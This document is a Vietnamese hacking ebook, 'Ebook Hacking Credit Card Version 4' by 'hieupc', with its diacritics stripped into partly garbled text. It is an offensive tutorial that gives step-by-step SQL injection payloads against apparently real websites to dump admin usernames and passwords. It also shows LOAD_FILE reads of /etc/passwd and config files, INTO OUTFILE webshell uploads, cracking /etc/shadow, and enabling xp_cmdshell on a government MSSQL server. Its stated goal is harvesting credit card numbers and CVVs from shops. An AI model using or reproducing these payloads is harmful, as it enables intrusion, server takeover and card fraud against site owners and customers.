ebook hacking credit card version

8/11/2019 eBook Hacking Credit Card Version

1/69

Ebook Hacking Credit Card

Version 4

-----

Its a special version which the title

will be: Hieupc Returns

Copyright by hieupc

Email: [email protected]

Yahoo ID:hieuitpc

Chm ngn: Cuc i l nhng chui ngy vt v, cc bn phi bit vt qua n th mi c th trng thnhv thnh cng c. ng nhc tr, hy ngh n gin ch l th thch ca cuc i.

Xut bn: 09-09-2009

Tc gi Ebook:Hieupc

Page 1
mailto:[email protected]:[email protected]:[email protected]


2/69

Ebook Hacking Credit Card Version 4 Hieupc

Li Ni u:

hi gian tri nhanh tht nh, mi m 4 nm tri, cuc sng ca hieupc thay i qunhiu trong khong thi gian ny. T mt thng chng bit g v vi tnh,bng chc ti bitqu nhiu iu v vi tnh, ti hc hi c rt nhiu t cch n ni, i x v thi

gi y c th tm gi l an tm ti c th sng tt x hi ny. Lc nh ti m c c mt cimy vi tnh,ba m ti mua cho ti nh mt mn qu bt ng,ban u ln mng c sch bo

thy c nhiu iu mi l lm ka v dn dn ti cng quen c vi ngi trn mng . Cho nginy ti vn nh h l ai v nickname ca h l g.Nu bn hi ti ti sao ti li c nhngy hm nay, thc s cu tr li cng n gin l s c gng khng ngng tm ti hc hi,nhng ti tht may mn khi gp c nhng bc trng lo v mng my tnh lc by gi v vym ti mi c mt tm hiu bit kh l rng nh by gi. Ti thch vit sch bi v ti thch chias kin thc ca mnh cho mi ngi, hy vng rng cc bn s tip thu c phn no t cunEbook ny. V vy, hy lun hc hi, c cng, chia s c nhn li v quan trng l ngnn ch.

P/S:Nu bn c cm thy cun Ebook ny bch i vi mi ngi th hy gipHieupc chia sn nh. Mi kin ng gp v ph bnh vui lng email vo a ch:[email protected].

My Friends: Ly0kha, PxNam, J0hnnywalk3r, Yeuemdaikho, Kehieuhoc, Langtuhaohoa,

Mr.saobang, Vampirevn, Thanhhuyleit, Thanhh83, Longnhi

Ch :Trong nhng bi vit di y c mt s ch c t mmu env ch mu lnhng ch cn phi ch .

Page 2

T
mailto:[email protected]:[email protected]:[email protected]:[email protected]


3/69


Mc Lc: Page

I. Exploiting PHP Injection: 4

1. PHP Injection l g? 4

2. Khai thc PHP Injection trit . 4 - 16

II. Getting Root Server by Many Methods: 17

1. K thut Exploit Get Root into MYSQL Server. 17 - 24

2.K thut chim quyn Admin quaSA MSSQL Server. 25 - 37

3.Nhng iu cn bit v Localhack. 38 - 48

III. How To Get These Important Information: 49

1. Kim link Admin nh th no. 49 - 50

2. Ly nhng thng tin quan trng m ta cn. 51 - 53

IV. Exploiting By Tool, Scripts: 54

1. Shell Scripts. 54

2. Tools Hack. 54

V. Speacial Things: 55

1. Hng dn cch Fix SQL Injection v nhng cch khc phc khc. 55 - 64

2.Ngn chn Localhack. 65 - 68

3. Thc tp SQL Injection. 69

Page 3


4/69


I. Exploiting PHP Injection:

1. PHP Injection l g:

PHP Injection xt v kha cnh server script l thut ng miu t im yu m mt attacker cth thc thi c code php khi khng kim sotgi tr truyn vo. V dtrng hp d liu avo c th s dng trong hm eval() hay include()

V d:

$myvar = 'somevalue';$x = $_GET['arg'];eval('$myvar = ' . $x . ';');

2. Khai thc PHP Injection trit :

SQL Injection l phng thc khai thc da vo qu trnh trao i dliu gia ngi dng vWeb Application. Vic ng dng khng kim tra cc gi tru vo n n attacker c thchothc thi cc SQL query khng mong mun can thip vo database lm thay i, thm, xem hayxa cc dliu.Hacker thng khai thc bng cc gi cc gi tru vo server sinh cc thng tin li tty bin theo cu truy vn gc ca ngi thit k.Nu Web Application c customize cc trang li hay cc trang li khng trv, phi lm thno? Hy thkhai thc vi phng thc: blind sql injection.

V d:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1

Kt qutrvl thng tin t database.

Nhng nu ta thm du: th sao nh.


Kt qu tr v l 1 trang trng.

Page 4


5/69


Ty bin 1:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=1

=>Trang web trvthng tin t database tng tnh trn

Ty bin 2:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=2

=> Khng sn phm no xut hin.

Vy ta nhn thy y 2 kt qutrvca trang web khc nhau. Vi ty bin 1 ta thm iukin 1=1 (true) skhng lm nh hng n kt quca cu truy vn gc nn vn hin ngthng tin t database, nhng vi iu kinty bin 2: 1=2 (false) thm vo, cu truy vn gc sbtrkt quvfalse dn n khng xut hin thng tin trn trang web. Da vo im ny ta cthdng cc truy vn ni vo sao cho kt qunhn l true/false ly thng tin vhthng!

Gischng ta khng bit trng v bng ca ng dng web ny l g?Vi li SQL Injection gy ra bi url trn ta xem thtruy vn (SQL) ca n liu c bao nhiutrng. Sd cn xc nh iu ny bi v khi chng ta dng UNION trong cu lnh SQL th slng trng ca hai cu lnh select phi trng nhau.

Ta s dng lnh Order by v thng qua lnh ny n s lm n gin vic m s v nhanhchng hn.

Xc nh c bao nhiu trng truy vn vi url:


C rt nhiu cch thc hin. y mnh sdng order by . Thc hin tng dn. Khi thc hin order by, nu trang web khng hin thli tc l slng trngvn cn, thc hin tng cho n khi no xut hin li tc l ta thc hin tm slng trng.

V d:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by1 -> vn cn bnh thng

Kt qu:

Page 5


6/69


http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by2 -> vncn bnh thng.

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by10 -> kt qu l trang trng, khng c ri.

Vy l ta bit kt qu b li s ch nm trong khong t10 tr xung v vy ta th:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by7 -> vn cn bnh thng

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by8 -> kt qu l trang trng, vy c ngha lsao, t nhin s 7 th thy cn bnh thng nhng khi ti s8 th kt qu l trang trng.

Suy ra: s 7 l s m chng ta ang tm y.

Nh vy truy vn SQL vi Website trn l 7 trng (field)n y c thiu tra phin bn SQL, User vi lnh sau:

V d:

Ch c du : - nhNu khi ta check SQL version m l: 4.5 hoc di 5.0 th coi nh ta phi m table v column.

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,3,4,5,6,7--

Kt qu hin ra : mt li t y ta c th khai thc tip: (nh di hnh, li hin ra s 3 v s 4)

Kim tra SQL Version xem sao:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,version(),4,5,6,7--

Page 6


7/69


Kt qu hin ra: (tht may mn khi SQL version trn 5.0, v version ny ta c th query all table_name haycolumn_name cng mt lc.)

V c th ta c th kim tra c nhiu information quan trng khc, da vo nhng cu lnh ny: version() , user(), database() , @@datadir , group_concat(schema_name) , table_schema ,

..+from+information_schema.schemata--

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=

-1%20union%20select%201,2,user(),4,5,6,7--

Kt qu hin ra:

Ta cng c thlm cch ny gp nhng thng tincn thit: concat_ws(0x3a,version(),user(),database())

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--

No gi chng ta tip tc khai thc ly tables v columns:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables--

Kt qu: trang trng, vy c ngha l sao, i lc ta cng hay gp tnh trng ny, cch gii quyt l th no y.

Page 7


8/69


Ta nhthm: unhex(hex(vo trc group_concat nh. Th kt qu th no:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7%20from%20information_schema.t

ables--

Kt qu:

Trong PHP injection hay cn gi l Blind Injection ta phi Hex tableli khai thc ly columns t nhng tablequan trng nh: admin, users, accounts.Ti sao phi Hexv Magic_Quotesang ch : ON

Sau khi, khai thc ly c ht tt c tables, Hieupc nhn thy site ny c mt table quan trng l: admin. Th khi

thc xem sao: (table: adminc Hieupc Hex thnh: 61646d696e)

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(column_name))),4,5,6,7%20from%20information_schem

a.columns where table_name=0x61646d696e--

nh c "0xpha trc dng hexnh. Tng t ta cng phi unhex(hex( v i vi site ny th ta phi vy, mt ssite khc c l khng c unhex(hex( hoc c cng khng sao.

Kt qu:

Nh ta thy: 2 column quan trng nht: username, pass ca table:admin

Bc k tip l query ly kt qu m ta t c:

http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(username,0x7c,pass))),4,5,6,7%20from%20admin

Page 8


9/69


Kt qu:

Nh vy ta c c:

Username: cuongle

Pass: cuongle

..v mt s user admin khc.

Lu : 0x7cl du |ta dng ci ny d nhn v ly thng tin d dng hn, ci ny ta convert ra Hex y m. Khiquery ly thng tin t table nh trong bi nyl: admin chng hn th ta khng cn phi Hex lm g.N tht ngin phi khng, ging nh nhng cch khai thc m trong nhng cun Ebook trc cng c v cp n.

No gi ta kim link admin vo xem sao: (thng th: admin, pcadmin, admin_login, admin.php.)

Sau mt hi m mm, cui cng th link admin ca n l:

http://www.hoanvustc.com/manager/gi ta th ng nhp vi username v pass hi ny query thxem sao.

Kt qu: (n y l thnh cng ri nh)

Page 9


10/69


Mt s kinh nghim ca Hieupc:

Trong vic khai thc blind sql injection mt shm sau tra hu ch:1. SUBSTRING(string,vtr, slng): Hm ct chuivd:

SUBSTRING('dbo', 1, 1) = d

SUBSTRING('dbo', 2, 1) = b

SUBSTRING('dbo', 3, 1) = o2. Lower(): chuyn k tsang chthng3. Upper(): chuyn k tsang chHOA4. ASCII(): chuyn k tsang stng ng m ascii5. If(k,kq1,kq2)

Ngoi ra ch thm:

- Mt s li thng gp ca Mysql Injection:

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in

C:\................ on line 37Li tr v l mt trang trng..

- Ta c th s dng: Union select all, Union all select

- Ta c th s dng table_schema xc nh c tablesca table_schema .

http://www.website.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=hieupc (nh convert hieupc sang Hex hoc Asciinh.)

- i khi ta hack khng m ra c link admin th ta c th query trc tip

t database ly nhng thng tin nh: CC, Information, user, pass.(vn kim link admin s c trnh by bi vit tip theo).

- Theo kinh nghim cho thy nu website config k s chn nhng hmnh: union, select, convert.lc ny ta c gng th bng cch thay vo l ch IN HOA v vit thng chen ln nhau. V d: UnIoN SelECt..

- Mt iu th v l khi bn vo c admin panel ri nhng thng tinquan trng nh: credit card number, hay password ca customer li b mho hoc b hide i di dng ****, th ta c th sa code li hay cn gil dch ngc code t hideunhide(ci ny ch p dng trong trnghp bn c source code ca website ).

- Mt s website secure cao hn th lc ta query ly table hoc columns hin ra trang trng hoc bo li th ny, ci ny chc potay ri:

Page 10


11/69


-Nu bn khai thc c user v pass ca admin m b m hoMD5, cth decode n y:

http://www.th3-0utl4ws.com/tools/md5/md5_looker.php

http://gdataonline.com/seekhash.php

-Ngoi ra nu bn gp nh dng m ho l,bn phi lm sao kim ckey m ho ca n t mi c th dch ngc li.

- i lc ta kim c link admin v c th login trc tip m khng cnuser v pass bng cch Bypass Login (ci ny s c trnh by bi vittip theo).

- Ta c th s dng du +thay cho khong trng space, v d:union+all+select.

- Trong bi Hieupc s dng: 0x7ctngtrng cho du | ta cng c th sdng nhng k t khc nh: du 2 chm. Mun convert t dng text

sang Hex, ta vo trang web sau:

http://www.string-functions.com/string-hex.aspx

(ta s thm 0xsau mi string-hex). V d: table: admin sau khi convert thc: 61646d696ev sau khi thm 0xth c: 0x61646d696e, ly ciny avo cu lnh khai thc.

- Hoc ta cng c th convert sang Asciithay v convert sang Hex. V d:table: adminconvert th ra: char(97,100,109,105,110)

- Mt cht vbng m ASCII:

Bk tASCIIgm 256 k tc phn bnh sau:

+ 32 k tu l cc k tiu khin khng in c v dnh k tENTER ( m13) , k tESC ( m 27)

+ cc m 32-47,58-64,91-96 v 123-127 l cc k tc bit nh du chm,chm phy , du ngoc , mc , hi .....

+ cc m 48-57 l 10 chs

+ cc m 65-90 l cc chci hoa A->Z

+ cc k t97-122 l cc chci thng a->z

+ cc m ASSCII l cc k tha.

- Trng hpbngn chn cc thng bo li gi tmy chbng cchthm du @trc cu lnh truy vn, dng ny rt kh b pht hin SQL

Injection. V d: Page 11


12/69


$id = $_GET[id]; @mysql_query("SELECT * FROM user WHEREid=$id");

Hoc sdng error_reporting(0);u on PHP code che du li

xc nh li ny khng ththm du cui cu truy vn nh trn do bchn hin li. Trong trng hp ny thta thm mt ng thcng sau cu truy vn nh sau:

http://web.com/user.php?id=1 and 1=1

Nu kt qutrang web sau khi thm vo biu thc trn khng bthay ita ni trang web khnng bli rt ln m ta c thkhai thc c.

-Ngoi ra mt s trang web m Hieupc tng hack, c dng du li nh

sau: khi ta thm du vo sau th khng hin g hoc hin ra ch mt phnno ca trang web, lc ny ta th view source v s thy liSQLInjection.

- View Source l mt th khng th thiu trong khi hack Web c bit lSQL Injection v mt s kiu hack khc nh: XSS, RFI, LFI.

-Nu bn gp MYSQL version di 5 th phi m table v column quantrng ly c thng tin mnh cn nh, ta cng c th dng nhng toolscan tables hay columns. V d:

- Trong mt vi trng hp ta cng c th s dng 1,1,1,1,1,1. Thay v1,2,3,4,5,6 trong cu lnh query SQL Injection.

- i khi ta dng lnh order bynhng trang vn hon ton trng th cngha l ta phi query bng cch nh t s 1 cho n khi no hin li mithi. V d site ny:

http://vn.lge.com/index.php?option=products&task=productsdetails&id=1 order by 1

Order by 1 : vn l trang trng, vy l ti y ta hiu ri nn phi t nhs v m mm thi, v d:

http://vn.lge.com/index.php?option=products&task=productsdetails&id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14--

Page 12


13/69


Kt qu:

-Nu trong khi hack chng ta thm du saumt trang c nghi vn b li,m kt qu tr v l mt trang trng hon ton, th c th trang web dnh li PHP Injection.

- Lnh union y chnh l lnh kt ni cc bng li vi nhau. Chng tacsdng cho n khi bit chnh xc c bao nhiu bng dliu nmtrong database.

- Nu trng hp xut hin li ta c ththm limit 0,1v tng dn limit1,1 limit 2,1ly ht tt cthng tin cn thit.

- Ta c th s dng concatthay cho group_concat

-Ta c th s dng null bit chnh xc c bao nhiu bng ca website, v d:

http://www.site.com/index.php?page=-1 union + + + select null, null/ *

http://www.site.com/index.php?page=99999 union + + + select null, null/ *

- Chng ta s s dng ln lt cc cu truy vn thng dng nh:

+union select null, nullunion select null, null, nullunion select null, null, null, null

- Xc nh nhanh c bao nhiu trng trong bng:

Order by 100 .D nhin cc ct khng thno qu 100 ct c.Vi cchthc ny ta c thnhanh chng bit c bao nhiu ct.V c sai th n sbo li. V vy s rt d ta on c mt Site c khong bao ct haytrng trong bng.

Page 13


14/69


-Nu bn query ra qu nhiu table m cha hin ra c table quan trngcn tm, th phi lm sao y, lc ny ta s dng n hm ny:

site.com/index.php?id=-1 union select1,2,substr(group_concat(table_name),100,300),3,4,5.. dnh cho nhng site bnhthng.

site.com/index.php?id=-1 union select 1,2,unhex(hex(substr(group_concat(table_name),100,300))),3,4,5.. dnh cho nhng siteno kh chu nh site m Hieupc demo trn.

tip tc xem nhng table tip theo th ta thay ln lt t 100ln 200ri 300..

- Hoc ta cng c th dng LIMIT 1 OFFSET 44-- c th xem tipnhng thng tin cha hin ht, ta thay i t 44 n 45, 46.... l tableshoccolumns s hinra ht.V d:

-

- Tu thuc vo h qun tr CSDL m c cc c php ghi commentkhcnhau, v d:

- Cn i vi sp_password th theo mnh bit th n c tc dng i

password ca user. V d:

Ngoi ra n c dng bn sau du comment trong cu lnh sql dng inject th trnh ghi log. Bi v khi thc thi mt cu lnh SQL thuc loi T-SQL th h qun tr s ghi nhn li s kin ny. Nu dng sp_password ns khng ghi nhn (c ghi nhn nhng khngghi li cu lnh SQL ca tacho d sp_password c sau du comment i vi SQL Server).

- 1 union selectcurrent_user,null/*

hoc1 union select user(),null/*

Cc cu lnh nyc th cung cp thng tin v MySQL user hin ti, dng nh:Usernam@serverHoc bn cng c th on tn user bng Blind SQLi nu nh khng union c. Cccu lnh v d:1 and user() like root

1 and mid(user(),1,1)1 and mid(user(),2,1)>m

1 and ascii(substring(user(),1,1))>64

Page 14

union select1,2,3,4,5,6,7,concat(table_name,07c,table_schema,07c),9,10,11,12,13,14,15,16,17,18,19FROM information_schema.tables LIMIT 1 OFFSET 44--

Microsoft Access: MySql : --, /* */ , /* , # trong bi vit ny cc bn ch Hieupc s dng du--Sql Server : -- , /* */ ,null byte %00

Sp_password 'old_pass','new_pass',user'


15/69


NuSQL Version di 5 th sao?

Theo mnh ngh th ch c cch l m tables v columns m mnh mun tm thi, hin nay cngc mt s cng c tool, script h tr scan.

Sau y l bi vit ca tc gi: Seamoun HVA s gip bn nm c phn no k thut ny.

u tin vi url:

http://site.com/phpevents/event.php?id=1

Thc hin thm du sau id=1. url tr thnh

http://site.com/phpevents/event.php?id=1

Ta pht hin rng phpvents c li SQL Injection vi thng bo sau:

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource inC:\xampp\htdocs\phpevents\event.php on line 37

Xc nh c bao nhiu trng truy vn vi:http://site.com/phpevents/event.php?id=1

Ln lt tath:

http://site.com/phpevents/event.php?id=1order by1(


16/69


Sau khi on c tn table l admin. Tip theo l d on tn trng trong bng admin mmnh ly c. C th on tn trng trong bng admin nh l username,uname,user, pass, passwd, password, pword, . (Tng t nh trn cng ty thuc vo kinh nghim kt hpvi vic crawl, spider ni dung web tm tn trng.). Tin hnh th nh sau:

http://site.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Nh vy trng th nht ta on c l uname trong bng admin. Thc hin on trng mtkhu:

http://site.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)http://site.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Nh vy ta on c trng mt khu l pword. Nh vy ta c thng tin y ly userv pass trong bng admin vi2 trng uname v pword + tn bng l admin

Thc hin lnh:http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 fromadmin

Thc cht vi hai cu lnh trn th ta tm c user v pass nhng mun thc hin lnh :

http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 fromadmin

c c tt c user v pass trong bng admin. Nu trng hp ny xut hin li ta c ththm limit 0,1v tng dn limit 1,1 limit 2,1 ly ht tt c user v pass

S d thc hin cu lnh trn ng thi ly uname v pword khng cn phi thc hin 2 lnmi c c uname v pword.

0x3a> du :. Concat s thc hin cng chui

n y ta c thng tin uname v pword.

Nu trng hp m kt ni n MySQL s dng user root th vic tm bng v trng d dnghn vi lnh sau.

iu tra thng tin bng:http://site.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 frominformation_schema.tables

iu tra thng tin trng:http://site.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 frominformation_schema.columns

Ngoi ra trong mt s trng hp xut hin li khi thc hin khai thc c th s dng hmconvert, hex, khng b li khi khai thc nh:http://site.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin

Page 16


17/69


II. Getting Root Server by Many Methods:

1. K thut Exploit Get Root into MYSQL Server.

Vn nm ch server MySQL cu hnh th no. V vy ta s s dng mt s cu lnh nhsau, di y l mt v d v mt site m Hieupc get root c vo MYSQL Server:

union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19

Kt qu:

union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19Kt qu: (SQL Version trn 5 nh, hn thit)

union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19Kt qu:

union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19

Database ca n nm y: "/var/lib/mysql/"

Page 17


18/69


Gi ta kim tra tnh privileges ca MYSQL USER xem sao (ci ny quyt nh n get rootc hay khng):

union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user

union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user

union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user

Kt qu tr li u nh hnh di,N ngha l No, cn nu n hin Y ngha l Yes:

Gi ta th vi cch ny xem sao vi user ca Mysql l: muum ta query c trn. (muu c convertsang Ascii l: CHAR(109, 117, 117) hoc cng c th convert sang Hex v kt qu convert sang Hex l:muu =

0x6d7575

union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109,117, 117)

Kt qu l ch Y vi user = muu (vy l ta c quyn vi user=muuny):

Bn cng c thkim tra quyn FILE trong bng trn m khng cn thm mnh where, tuy nhin Hieupc vnthm n vo v y l cch nhanh v d dng nht - khi chuyn sang Blind:

1 and mid((select file_privfrom mysql.user where user=CHAR(109, 117, 117)),1,1)=a

(ng c thm NULL y, v y khngphi l union select)

Cch trn c th p dng cho c Mysql version 4.x v 5.xNu MySQL l 5.x ta cn c th xem quyn FILE ngay trong information_schema

0 union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = file andgrantee like %username%

Viblind:1 and mid((select is_grantable from information_schema.user_privileges where privilege_type = file and granteelike %username%),1,1)=Y

Page 18


19/69


20/69


hin th warning ny c th th cu lnh 0 AND 1=0

Cch lm trn c hiu qu i vi hu ht mi website, tuy nhin nu thng bo li ca mysql btt th bn c th c gng on th mc cha web bng cch s dng lnh LOAD_FILE() load v c cc file cu hnh. Mts ng dn mc nh n file cu hnh:

/etc/init.d/apache/etc/init.d/apache2/etc/httpd/httpd.conf/etc/apache/apache.conf/etc/apache/httpd.conf/etc/apache2/apache2.conf/etc/apache2/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/apache/conf/httpd.conf/opt/apache/conf/httpd.conf/home/apache/httpd.conf/home/apache/conf/httpd.conf/etc/apache2/sites-available/default/etc/apache2/vhosts.d/default_vhost.include

Cng cn ch xem h iu hnh ca webserver l *nix hay win m on cho tt

Thng thng th mc gc cha web thng t :

/var/www/html//var/www/web1/html//var/www/sitename/htdocs//var/www/localhost/htdocs/var/www/vhosts/sitename/httpdocs/

Bn c th google tm thm. Thng thng bn c th ghi files ln tt c cc th mc mMysql server c quyn ghi ln, min l bn c quyn FILE. Tuy nhin Admin c th gii hn ccth mc c th ghi c t public. Xem thm tihttp://dev.mysql.com/doc/refman/5.1/s-options.html

Ny gi chng ta tm hiu k cng. Gi ta th load_fileconfig.php xem ci no i vi Sitem ny gi ta ang c get root y:

C:/Program Files/Web/config.phpconvert nguyn on ny sang Ascii nh, sau khi convert thc:

char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)

Gith ci no(ch :user = muucng convert sang Ascii lun nh, muu= CHAR(109, 117,117)):

union all select1,2,3,load_file(char(67,58,92,80,114,111,103,114,97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,114,118,101,114,53,46,48,92,68,97,116,97,92,99,111,110,102,105,103,46,112,104,112)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user where user=CHAR(109, 117, 117)

Page 20
http://dev.mysql.com/doc/refman/5.1/en/privileges-options.htmlhttp://dev.mysql.com/doc/refman/5.1/en/privileges-options.htmlhttp://dev.mysql.com/doc/refman/5.1/en/privileges-options.htmlhttp://dev.mysql.com/doc/refman/5.1/en/privileges-options.htmlhttp://dev.mysql.com/doc/refman/5.1/en/privileges-options.htmlhttp://dev.mysql.com/doc/refman/5.1/en/privileges-options.html


21/69


Kt qun tng:

Gi th ly username v password ny kt ni vo databse server xem sao , n y ta dng

MySQL Query Browser connect database, ci ny ln google.com download v nh:

Kt qu( connect thnh cng, khng bit shop ny c CC nhiu khng ta):

Nhn hnh trn th ta thy: tblcart_paymentl c kh nng cha thng tin CC.

Cm gic m get root c MYSQL server rt l cc bn , hu nh mnh c th lm c ttc mi chuyn nh Drop, Update, Delete, hay Insert thng tinMay mn thay user vpass MySQL ging ca WHM (Cpanel Root), hnh minh ho bn di:

Page 21


22/69


Check xem Shop ny c CC khng no (Xem ci ID cng nhiu y ch, shop ny chc ngon ,c CVV na ch):

Kt qu nh Hieupc d on:

Kinh nghim:

Ngoi ra, ta c th dng lnh load_file view ci ny: /etc/passwd. V d:

union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119,100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)

Page 22


23/69


Kt qu (ch :nh convert c etc/passwordv user= muusang m Ascii nh):

Ta cng c th view c:/etc/shadownu ta c quyn root trong tay, nu ly c pass cashadow bn nm c full quyn s dng server ri y , crack pass shadow = john171d,download trn google.com nh.

Mt iu khc na l c th update nhngthng tin c sn,bng cch dng lnh: Update

V d(ng qun convert sang Ascii nhnh muu.):

update table_name set column_name=new value where column_name=value where user=muu

Trng hp c quyn FILE, upload Backdoor bng cch nh sau:

Khi bn chc chn c quyn FILE v xc nh c th mc ghi file, bn c th tin hnhghi bng cu lnh SQL:

0 UNION SELECT columnname,null FROM tablenameINTO OUTFILE../../web/dir/file.txt

Hoc l ghi bt c d liu g, khi ta khng bit tn bng v ct:

1 OR 1=1 INTO OUTFILE ../../web/dir/file.txt

Nu mun b cc k t splitting trong d liu, ta c th s dng INTO DUMPFILEthay vINTO OUTFILE

Cng c th kt hp gia load_file() c cc file trn server

0 AND 1=0 UNIONSELECT load_file() INTO OUTFILE

Trong mt s trng hp ta cn s dng hex v unhex:

0 AND 1=0 UNION SELECT hex(load_file()) INTO OUTFILE

Hoc bn c th ghi bt c th gvo file, nh l webshell chng hn:

0 AND 1=0 UNION SELECT '',null INTO OUTFILE ../../web/server/dir/hieupc.php

Page 23


24/69


y l 1 s vd:

// PHP SHELL

'


25/69


2. K thut chim quyn Admin quaSA MSSQL Server:

Sau y l mt v d thc t v chim quyn Admin qua SA m hieupc thc hin trn 1 serverVN m c ui l: GOV.VN (hieupc xin gi kn site ny v trnh site b ph hoi). Thngthng li nh sau l bn c th chim quyn Admin mt cch d dng nu Server xi quyn SA

hoc l mt user c ngang quyn SA chng hn . check xem c lihay khng th thm du .V d:

Check thng tin h thng ci no. Ta s dng cu lnh gp thng tin nh sau. V d:

http://www.hieupc.gov.vn/hieupc.asp?id=1/**/and/**/1=convert%28int,@@servername%2bchar(124)%2bdb_name()%2bchar(124)%2bsystem_user%2bchar(124)%2b@@version)--sp_passwordKt qu:

Kim tra xem System_User hin ti c quyn ngang = SA khng:

i lc c nhng System_user c quyn ngang = SAnhng lc query chng ta khng thy n ctn l 'SA' nn thng bqua ...

C 1 cch bn kim tra xem System_user c nm trong role sysadminkhng (ngang =SA)

V dvictim l:

www.hieupc.gov.vn/hieupc.asp?id=1

Page 25


26/69


Kim tra System_User

www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,system_user)--sp_password

Kt qu:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'hieupc'to a

column of data type int.

Nh vy l System_userm Server ny ang dng c tn l hieupc,by gita thkim traxem hieupcc quyn ngang = SAkhng

www.hieupc.gov.vn/hieupc.asp?id=1;drop table check_sysuser create table check_sysuser(id int identity,noi_dung

varchar(1000)) insert into check_sysuser select sysadmin from master..syslogins where name = 'hieupc'--

sp_password

===> to ra 1 table tn check_sysuserv chn gi trout put ca cu query select sysadminfrom master..syslogins where name = 'hieupc'vo trng noi_dungca table...

http://www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung%2b'/' from check_sysuser

where id=1))--sp_password

===> Select gi trca trng noi_dung, bn ch %2bngha l du +.Kt qu:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1/ 'to a column of

data type int.

===> Ngha l ti khon SQL hieupcc quyn ngang = SA. Trong bi ny Server m Hieupcang hack th user = quyn SA.

Trng hp m bo li th ny:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '0/ 'to a column of

data type int.

===> Ngha l ti khon SQL hieupckhng c quyn hnh = SA, ta chc thkhai thc lythng tin nh bnh thng th c.

Gita phi lm gnu c quyn SA trong tay?

Enable xp_cmdshelltrn SQL Server 2005

-Nh cbit th MSSQL Server 2005 mc nh l Disable lnh xp_cmdshell ngha l ngayckhi c ti khon SQL l "SA" ta cng khng thchy ccc cu lnh CMD:

Page 26


27/69


+ V dvictim l:

www.hieupc.gov.vn/hieupc.asp?id=1(Site ny c quyn system_user= SA lun nh) , khi ta th chy cu lnh CMD sau:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password

Kt qu tr v l khng c li g.

